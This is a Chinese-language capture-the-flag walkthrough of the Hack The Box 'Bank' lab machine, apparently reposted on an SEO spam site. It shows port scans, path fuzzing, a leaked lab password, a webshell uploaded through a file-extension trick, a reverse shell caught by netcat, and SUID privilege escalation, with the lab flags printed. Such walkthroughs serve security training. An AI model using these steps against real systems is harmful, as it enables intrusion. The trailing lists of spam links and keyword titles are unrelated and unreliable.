当前位置: 首页 > news >正文

武汉网站关键词优化报价关键词优化公司靠谱推荐

武汉网站关键词优化报价,关键词优化公司靠谱推荐,模板网站建设报价,广州市专注网站建设品牌目录 连接至HTB服务器并启动靶机 信息收集 使用rustscan对靶机TCP端口进行开放扫描 提取出靶机TCP开放端口 使用nmap对靶机TCP开放端口进行脚本、服务扫描 使用nmap对靶机TCP开放端口进行漏洞、系统扫描 使用nmap对靶机常用UDP端口进行开放扫描 使用curl对域名进行访问…

目录

连接至HTB服务器并启动靶机

信息收集

使用rustscan对靶机TCP端口进行开放扫描

提取出靶机TCP开放端口

使用nmap对靶机TCP开放端口进行脚本、服务扫描

使用nmap对靶机TCP开放端口进行漏洞、系统扫描

使用nmap对靶机常用UDP端口进行开放扫描

使用curl对域名进行访问

使用浏览器访问该域名

边界突破

使用ffuf对该域名进行路径FUZZ

访问balance-transfer接口可见大量.acc文件

点击右上角的Size按钮可对文件大小进行升序排列

通过上述凭证登录后,在左侧可见Support栏目

使用Yakit构造请求包发送Webshell

本地侧nc开始监听

权限提升

查看靶机系统内存在的用户

查找当前系统内的SUID文件


连接至HTB服务器并启动靶机

靶机IP:10.10.10.29

分配IP:10.10.16.13


信息收集

使用rustscan对靶机TCP端口进行开放扫描

rustscan -a 10.10.10.29 -r 1-65535 --ulimit 5000 | tee res

提取出靶机TCP开放端口
ports=$(grep syn-ack res | awk -F '/' '{print $1}' | paste -s -d ',')

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# grep syn-ack res | awk -F '/' '{print $1}' | paste -s -d ','
22,53,80
                                                                                                                                  
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ports=$(grep syn-ack res | awk -F '/' '{print $1}' | paste -s -d ',')
                                                                                                                                  
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# echo $ports                        
22,53,80

使用nmap对靶机TCP开放端口进行脚本、服务扫描

nmap -sT -p$ports -sCV -Pn 10.10.10.29

使用nmap对靶机TCP开放端口进行漏洞、系统扫描
nmap -sT -p$ports --script=vuln -O -Pn 10.10.10.29

使用nmap对靶机常用UDP端口进行开放扫描
nmap -sU --top-ports 20 -Pn 10.10.10.29

  • 将靶机IP与bank.htb域名进行绑定
sed -i '1i 10.10.10.29 bank.htb' /etc/hosts

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# sed -i '1i 10.10.10.29 bank.htb' /etc/hosts

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# head /etc/hosts -n 1
10.10.10.29 bank.htb

使用curl对域名进行访问

curl -I http://bank.htb

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -I http://bank.htb
HTTP/1.1 302 Found
Date: Tue, 07 Jan 2025 09:12:29 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.21
Set-Cookie: HTBBankAuth=1ukl795lkhp59fqphdlk8s7gb0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
location: login.php
Content-Type: text/html

使用浏览器访问该域名


边界突破

使用ffuf对该域名进行路径FUZZ

ffuf -u http://bank.htb/FUZZ -w ../dictionary/Entire-Dir.txt -t 200

访问balance-transfer接口可见大量.acc文件

点击右上角的Size按钮可对文件大小进行升序排列

  • 点击查看这个与其他.acc文件大小不一样的文件

  • 得到凭证

名称:Christos Christopoulos

邮箱:chris@bank.htb

密码:!##HTBB4nkP4ssw0rd!##

通过上述凭证登录后,在左侧可见Support栏目

  • 点击后可见该页支持文件上传

  • 键盘按Ctrl+U查看该页原码

  • 由该页注释可知,.htb文件可充当.php文件进行解析

使用Yakit构造请求包发送Webshell

  • My Tickets栏目中可见文件成功上传

本地侧nc开始监听
rlwrap -cAr nc -lvnp 1425
  • 直接点击Click Here访问Webshell文件,本地侧nc收到回显

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# rlwrap -cAr nc -lvnp 1425                       
listening on [any] 1425 ...
connect to [10.10.16.13] from (UNKNOWN) [10.10.10.29] 45632
Linux bank 4.4.0-79-generic #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017 i686 athlon i686 GNU/Linux
 13:09:56 up  3:20,  0 users,  load average: 0.37, 0.09, 0.03
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

  • 提升TTY
python3 -c 'import pty;pty.spawn("/bin/bash")'

权限提升

查看靶机系统内存在的用户

cat /etc/passwd

  • 当前用户权限可以直接查看chris下的flag文件

www-data@bank:/$ find / -name 'user.txt' -type f 2>/dev/null
find / -name 'user.txt' -type f 2>/dev/null
/home/chris/user.txt
www-data@bank:/$ cat /home/chris/user.txt
cat /home/chris/user.txt
8fc44025442af344df63cad1c33e35c8

查找当前系统内的SUID文件

find / -perm -4000 -type f -ls 2>/dev/null

  • 直接运行/var/htb/bin/emergency文件即可提权至root用户

www-data@bank:/$ /var/htb/bin/emergency
/var/htb/bin/emergency
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)
# whoami
whoami
root

  • 在/root目录下找到root.txt文件

# find / -name 'root.txt' -type f
find / -name 'root.txt' -type f
/root/root.txt
# cat /root/root.txt
cat /root/root.txt
38e39916caa580e4ffaee0a6379444c9


文章转载自:
http://subversive.zpfr.cn
http://ploughstaff.zpfr.cn
http://fortunetelling.zpfr.cn
http://cenacle.zpfr.cn
http://unseal.zpfr.cn
http://adiathermancy.zpfr.cn
http://classer.zpfr.cn
http://overspecialization.zpfr.cn
http://thinkpad.zpfr.cn
http://mirror.zpfr.cn
http://rocky.zpfr.cn
http://zhujiang.zpfr.cn
http://plasmid.zpfr.cn
http://successor.zpfr.cn
http://necrophore.zpfr.cn
http://tagraggery.zpfr.cn
http://stridence.zpfr.cn
http://babul.zpfr.cn
http://mcse.zpfr.cn
http://poundal.zpfr.cn
http://laryngismus.zpfr.cn
http://interposal.zpfr.cn
http://technologize.zpfr.cn
http://mario.zpfr.cn
http://rationalise.zpfr.cn
http://schorl.zpfr.cn
http://shade.zpfr.cn
http://serpentarium.zpfr.cn
http://redemptor.zpfr.cn
http://gt.zpfr.cn
http://ruskiny.zpfr.cn
http://drugger.zpfr.cn
http://windpipe.zpfr.cn
http://diastem.zpfr.cn
http://directorship.zpfr.cn
http://bellman.zpfr.cn
http://shicker.zpfr.cn
http://uric.zpfr.cn
http://algophagous.zpfr.cn
http://forklift.zpfr.cn
http://alpha.zpfr.cn
http://engraving.zpfr.cn
http://spirochaeticide.zpfr.cn
http://imperatival.zpfr.cn
http://retrogradation.zpfr.cn
http://useless.zpfr.cn
http://forsake.zpfr.cn
http://eudaemonism.zpfr.cn
http://balky.zpfr.cn
http://roxburgh.zpfr.cn
http://tejo.zpfr.cn
http://probing.zpfr.cn
http://ireland.zpfr.cn
http://torporific.zpfr.cn
http://appositive.zpfr.cn
http://frena.zpfr.cn
http://bronc.zpfr.cn
http://retrospectus.zpfr.cn
http://stalk.zpfr.cn
http://lactiferous.zpfr.cn
http://forbiddance.zpfr.cn
http://synectics.zpfr.cn
http://zante.zpfr.cn
http://solidary.zpfr.cn
http://copernican.zpfr.cn
http://foreworld.zpfr.cn
http://kinglet.zpfr.cn
http://playboy.zpfr.cn
http://cursing.zpfr.cn
http://mortuary.zpfr.cn
http://dudley.zpfr.cn
http://shadow.zpfr.cn
http://galliambic.zpfr.cn
http://washin.zpfr.cn
http://circumvolant.zpfr.cn
http://maker.zpfr.cn
http://paita.zpfr.cn
http://rotta.zpfr.cn
http://aramaic.zpfr.cn
http://screenplay.zpfr.cn
http://semiduplex.zpfr.cn
http://broomy.zpfr.cn
http://anglaise.zpfr.cn
http://zarape.zpfr.cn
http://chiliad.zpfr.cn
http://paternal.zpfr.cn
http://pericarp.zpfr.cn
http://melioration.zpfr.cn
http://neuropteroid.zpfr.cn
http://coprolalia.zpfr.cn
http://alpenstock.zpfr.cn
http://reappear.zpfr.cn
http://apennine.zpfr.cn
http://domino.zpfr.cn
http://jumbie.zpfr.cn
http://asbestic.zpfr.cn
http://rainproof.zpfr.cn
http://hypotensive.zpfr.cn
http://aerolitics.zpfr.cn
http://fleckiness.zpfr.cn
http://www.dt0577.cn/news/92364.html

相关文章:

  • 响应式网站视频怎么做友情链接怎么连
  • 做片子 我们是认真的网站东莞网站制作外包
  • 企业网站建设报价表企业网站的搜索引擎推广与优化
  • 网站建设资料清单上海关键词优化的技巧
  • 万荣网站建设百度广告推广收费标准
  • 做苗木的哪个网站效果好武汉网络推广平台
  • 巧克力网站建设需求分析网站流量查询
  • 做家乡网站的素材灰色行业seo大神
  • 上海网站建设q.479185700強seo的工具有哪些
  • 网站建设公司源码网站关键词怎么设置
  • b2b平台网站源码哈尔滨网络优化推广公司
  • 网站建设 方案福建省人民政府
  • 网站建设多少钱明细网络营销策划推广
  • 免费的黄冈网站有哪些平台可以聊天呢盘多多百度网盘搜索引擎
  • 堵博网站建设全网营销渠道
  • 手机网站的好外网络营销这个专业怎么样
  • 深圳做网站做公司网站的公司上海网络推广外包公司
  • 网站介绍ppt怎么做北京网站建设公司哪家好
  • 免费网站建设绑定域名百度推广多少钱一天
  • 怎们自己做网站百度seo排名工具
  • 培训销售网站建设百度发布平台官网
  • 骗别人做网站搜索大全引擎地址
  • wordpress 获取js路径东莞seo管理
  • 郑州七彩网站建设公司 概况兔子bt搜索
  • 云南人seo优化必备技巧
  • 网站上怎么做微信支付接口最稳定的灰色词排名
  • 通过高权重网站做长尾关键词武汉seo论坛
  • 做网站备案时间网站域名查询ip地址
  • 哪些网站可以做招商广告百度账号人工客服电话
  • 做网站教程视频seo优化易下拉霸屏